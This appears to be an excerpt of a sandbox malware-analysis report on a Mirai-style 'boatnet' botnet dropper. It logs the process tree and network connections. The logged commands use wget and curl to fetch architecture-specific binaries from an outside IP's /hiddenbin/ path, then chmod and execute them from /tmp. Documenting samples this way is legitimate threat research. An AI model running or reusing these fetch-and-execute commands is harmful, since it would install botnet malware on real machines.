[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
Files
/tmp/boatnet.x86
/tmp/WTF
/tmp/WTF
/tmp/WTF
/tmp/WTF
/tmp/WTF
memory/819-1-0x00400000-0x00452a58-memory.dmp